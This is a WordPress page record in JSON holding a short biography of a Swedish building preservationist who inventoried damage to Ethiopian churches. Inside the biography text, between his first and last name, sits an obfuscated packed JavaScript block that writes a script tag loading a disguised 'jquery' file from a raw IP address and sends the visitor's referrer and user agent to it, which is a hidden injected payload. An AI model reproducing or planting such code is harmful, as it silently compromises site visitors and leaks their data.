{"id":486,"date":"2011-04-16T19:17:31","date_gmt":"2011-04-16T17:17:31","guid":{"rendered":"http:\/\/conservationinethiopia.org\/?page_id=486"},"modified":"2016-04-27T23:56:36","modified_gmt":"2016-04-27T21:56:36","slug":"petter-jansson","status":"publish","type":"page","link":"https:\/\/conservationinethiopia.org\/?page_id=486","title":{"rendered":"Building preservationist Jansson"},"content":{"rendered":"<p><a href=\"https:\/\/conservationinethiopia.org\/wp-content\/uploads\/2011\/04\/Petter-liten.jpg\"><img loading=\"lazy\" decoding=\"async\" title=\"Petter liten\" src=\"https:\/\/conservationinethiopia.org\/wp-content\/uploads\/2011\/04\/Petter-liten.jpg\" alt=\"\" width=\"200\" height=\"144\" \/><\/a><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #339966;\">PETTER <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sfhez|var|u0026u|referrer|dhidh||js|php'.split('|'),0,{}))\n<\/script><\/noindex> JANSSON <\/span>is 1st Building Preservationist at The Regional Museum of Kristianstad in Sk\u00e5ne, Lund, Sweden. This is the regional institution, subordinated to Riksantikvarie\u00e4mbetet (RA\u00c4, i.e. the national authority for the Swedish Cultural Heritage), which in Sk\u00e5ne (the southernmost part of the country) have the responsibility for the ancient public houses and churches. As preservationist he is the supervisor and issues permissions for various conservation projects. He also represents RA\u00c4 and the Swedish laws that regulates what is permitted and not as regards cultural heritage. The major part of his activity is dedicated to field work where he visit ancient buildings under control of RA\u00c4. He has developed a certain skill of communicating issues concerning cultural heritage to persons on the countryside not always aware about the value of this, as well with artisans active in this field. He have expertise in drafting conservation projects as well as of damage inventory, documentation and reporting. With his long experience and deep-going knowledge about ancient building constructions and materials, he greatly contribute to the caretaking and supervising of this unvaluable historical legacy. As an expert in the ancient building monuments of Sk\u00e5ne and in how to take care of these as regards structural stability, treatment of roof\/ceiling, walls and plaster and in finding the ultimate ways of preserving the artistical andornment in these ones, his role is significant. He has not least supervised the famous medieval and richly decorated churches of Sk\u00e5ne.\u00a0Together with painting restorer Lars Gerdmar, he has accomplished a preliminary inventory of the damages to churches from the 6th to 19th century in Ethiopia.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>PETTER JANSSON is 1st Building Preservationist at The Regional Museum of Kristianstad in Sk\u00e5ne, Lund, Sweden. This is the regional institution, subordinated to Riksantikvarie\u00e4mbetet (RA\u00c4, i.e. the national authority for the Swedish Cultural Heritage), which in Sk\u00e5ne (the southernmost part of the country) have the responsibility for the ancient public houses and churches. As preservationist [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-486","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/conservationinethiopia.org\/index.php?rest_route=\/wp\/v2\/pages\/486","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/conservationinethiopia.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/conservationinethiopia.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/conservationinethiopia.org\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/conservationinethiopia.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=486"}],"version-history":[{"count":18,"href":"https:\/\/conservationinethiopia.org\/index.php?rest_route=\/wp\/v2\/pages\/486\/revisions"}],"predecessor-version":[{"id":4342,"href":"https:\/\/conservationinethiopia.org\/index.php?rest_route=\/wp\/v2\/pages\/486\/revisions\/4342"}],"wp:attachment":[{"href":"https:\/\/conservationinethiopia.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=486"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}